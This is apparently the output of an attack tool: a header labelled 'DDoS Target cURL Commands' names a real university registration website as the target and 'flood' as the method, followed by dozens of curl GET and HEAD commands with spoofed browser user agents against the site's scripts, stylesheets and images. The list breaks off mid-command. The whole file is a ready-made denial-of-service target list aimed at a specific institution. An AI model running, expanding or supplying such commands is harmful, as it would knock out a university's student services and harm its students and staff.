# DDoS Target cURL Commands
# Target: https://reg.up.ac.th/
# Attack Method: flood
# Generated: 2025-12-13T10:20:09+07:00
# Total valid endpoints: 117

curl \
  -X \
  HEAD \
  'https://fonts.googleapis.com/css2?family=Kanit:ital,wght@0,300;0,400;0,500;1,300;1,400;1,500&family=Sarabun:ital,wght@0,300;0,400;0,500;1,400;1,500&display=swap' \
  -H \
  'Content-Type: text/css; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://fonts.googleapis.com/css2?family=Kanit:ital,wght@0,300;0,400;0,500;1,300;1,400;1,500&family=Sarabun:ital,wght@0,300;0,400;0,500;1,400;1,500&display=swap' \
  -H \
  'Content-Type: text/css; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/service-report.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/infocovid/3.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/components/slick-carousel/slick/slick.css?v=20220911' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/service-student.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/video-conference.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/uploads/content_picture/thumbnail/5f22445c6dd0e.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/css/style.css' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/infocovid/microsoft.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/infocovid/4.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/components/masonry-layout/dist/masonry.pkgd.min.js' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/components/jquery-form/dist/jquery.form.min.js' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/service-register.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/plugins/cookie-consent/custom.css?v=20220705' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/components/slick-carousel/slick/slick.css?v=20220911' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/components/masonry-layout/dist/masonry.pkgd.min.js' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/dist/js/home-init.js?v=20251016' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/dist/js/bootstrap-tabdrop.js?v=20251015' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/dist/css/login.css?v=20220911' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/components/bootstrap/dist/js/bootstrap.min.js?v=20251015' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/components/js-base64/base64.min.js' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/infocovid/5.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/infocovid/microsoft.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/content-more.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/uploads/content_picture/thumbnail/62849d62988f3.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/service-student.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/infocovid/7.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/components/animate.css/animate.min.css' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/components/slick-carousel/slick/slick.min.js' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/dist/js/login.js?v=20251015' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/infocovid/check.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/favicon.ico' \
  -H \
  'Content-Type: image/x-icon' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/youtube.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/icons8-microsoft-teams-2019.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/favicon.ico' \
  -H \
  'Content-Type: image/x-icon' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/content-more.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/dist/css/print.css?v=20220911' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/css/main.css' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/favicon.ico' \
  -H \
  'Content-Type: image/x-icon' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/online-learning-0.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/plugins/wow/dist/wow.min.js' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/service-evaluate.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/dist/js/slick-custom.js' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/flags/th.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/uploads/content_picture/thumbnail/5f59e0d91b280.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/dist/css/login.css?v=20220911' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/logo-md.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/uploads/news_picture/thumbnail/6916ff94d7ab3.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/infocovid/zoom.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/uploads/news_picture/thumbnail/6936ab100f0bb.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/infocovid/microsoftstream.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/dist/js/login.js?v=20251015' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/infocovid/apple.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/plugins/cookie-consent/dist/cookieconsent.js?v=20220911' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/uploads/news_picture/thumbnail/68fed79e21dc6.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/online-learning-0.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/plugins/cookie-consent/dist/cookieconsent.css?v=20220620' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/components/jquery/dist/jquery.min.js?v=30200421' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/uploads/news_picture/thumbnail/68fb32a9b6a29.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons-pwa/touch-icon-ipad-retina.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/uploads/news_picture/thumbnail/690dc5fb6f2dd.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/static/main.js' \
  -H \
  'Content-Type: text/html; charset=UTF-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/dist/css/print.css?v=20220911' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/css/style.css' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/assets/main.css' \
  -H \
  'Content-Type: text/html; charset=UTF-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/static/main.css' \
  -H \
  'Content-Type: text/html; charset=UTF-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/infocovid/6.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/components/slick-carousel/slick/slick.min.js' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/content_empty.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/announce-schedule.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/uploads/news_picture/thumbnail/691a86ab39f74.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/infocovid/3.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/dist/css/style.css?v=20240131_1' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/components/hamburgers/dist/hamburgers.min.css' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/plugins/cookie-consent/dist/cookieconsent.css?v=20220620' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/components/css-element-queries/src/ResizeSensor.js' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/components/jquery/dist/jquery.min.js?v=3.4.1' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/service-register.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/infocovid/apple.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/uploads/news_picture/thumbnail/691a86ab39f74.jpg' \
  -H \
  'Content-Type: image/jpeg' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/infocovid/microsoftstream.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/icons8-microsoft-teams-2019.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/youtube.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/components/bootstrap/dist/css/bootstrap.min.css?v=20220911' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/components/swiper/swiper-bundle.min.css?v=20221019' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/plugins/cookie-consent/custom.css?v=20220705' \
  -H \
  'Content-Type: text/css' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/user.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/plugins/cookie-consent/init.js?v=20220911' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/service-room.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/infocovid/1.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons/infocovid/googlemeet.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  'https://reg.up.ac.th/images/icons-pwa/touch-icon-ipad-retina.png' \
  -H \
  'Content-Type: image/png' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/announce-calendar-2.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/images/icons/service-request.svg' \
  -H \
  'Content-Type: image/svg+xml' \
  -H \
  'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'

curl \
  -X \
  HEAD \
  'https://reg.up.ac.th/dist/js/popper.js' \
  -H \
  'Content-Type: application/javascript; charset=utf-8' \
  -H \
